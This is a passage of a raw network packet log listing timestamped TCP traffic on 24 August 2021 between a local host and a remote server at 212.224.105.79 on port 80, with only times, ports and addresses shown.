Aug 24, 2021 08:49:20.141583920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.143069029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.143090963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.143126011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.143285036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.147907972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.147958994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.147989035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148001909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148026943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148044109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148060083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148072958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148076057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148488998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148518085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148561001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148571014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148628950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148652077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148669958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148686886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148709059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148718119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148721933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148735046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148753881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148780107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148798943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148814917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148814917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148818970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148833036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148848057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148868084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148883104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148890972 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148895025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148905993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148922920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148942947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148960114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148972034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148976088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.148982048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.148998976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149014950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149039984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149055958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149060011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149064064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149082899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149101019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149113894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149116993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149117947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149133921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149149895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149167061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149183035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149190903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149194956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149202108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.149260044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.149262905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.150657892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.150763035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.150835991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.150891066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.151019096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.151354074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.152025938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.152045012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.152060986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.152081013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.152097940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.152100086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157320976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157345057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157361031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157377005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157392979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157407999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157424927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157440901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157460928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157460928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157471895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157479048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157495975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157512903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157530069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157545090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157562017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157577991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157599926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157602072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157603025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157618999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157635927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157655001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157664061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157669067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157670021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.157680988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157692909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157799959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.157988071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158042908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158050060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158137083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158153057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158169031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158185959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158201933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158219099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158235073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158255100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158272982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158272982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158277988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158288956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158305883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158323050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158333063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158337116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158339024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158354998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158373117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158391953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158396006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158401012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158410072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158426046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158440113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158457041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158477068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158485889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158488989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158493996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158510923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158529043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158545971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158559084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158575058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158596992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158601999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158607960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158624887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158641100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158657074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158673048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158689022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158704042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.158730030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.158732891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.160717964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161099911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161139965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161158085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161175966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161194086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161212921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161235094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161252975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161267996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161287069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161307096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161319017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161336899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161360979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161365032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161375999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161385059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161406040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161413908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161417007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161426067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161442995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161463022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161480904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161495924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161504030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161508083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161514044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161536932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161556959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161565065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161567926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161581039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161609888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161631107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161655903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161655903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161659956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161675930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161691904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161708117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161725998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161741972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161761045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161763906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161767960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161770105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161780119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161796093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161813021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161828995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161835909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161844969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161860943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161876917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161895990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161914110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161926031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161930084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.161930084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161947012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161963940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161978960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.161994934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162003040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.162007093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.162019968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162036896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162059069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162081003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.162081957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162086010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.162098885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162115097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162131071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162147045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162163973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162179947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.162189960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.162194014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.163716078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167382002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167417049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167433023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167448997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167464972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167484045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167494059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167501926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167504072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167517900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167537928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167546988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167563915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167578936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167596102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167599916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167603970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167612076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167627096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167643070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167649984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167653084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167663097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167680979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167689085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167696953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167712927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167730093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167746067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167758942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167762041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167763948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167778015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167798042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167814970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167817116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167819977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167830944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167846918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.167880058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.167882919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.171994925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172020912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172084093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172101974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172117949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172133923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172149897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172162056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172178984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172194958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172211885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172226906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172241926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172245979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172259092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172261000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172275066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172293901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172317028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172319889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172374010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172390938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172406912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172422886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172430992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172435045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172441006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172458887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172475100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172489882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172501087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172503948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172507048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172523975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172539949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172555923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172564030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172566891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172574043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172590971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172606945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172622919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172637939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172646046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172651052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172653913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172669888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172684908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172697067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172700882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.172704935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172723055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172739029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.172755003 CEST	80	49712	212.224.105.79	192.168.2.5
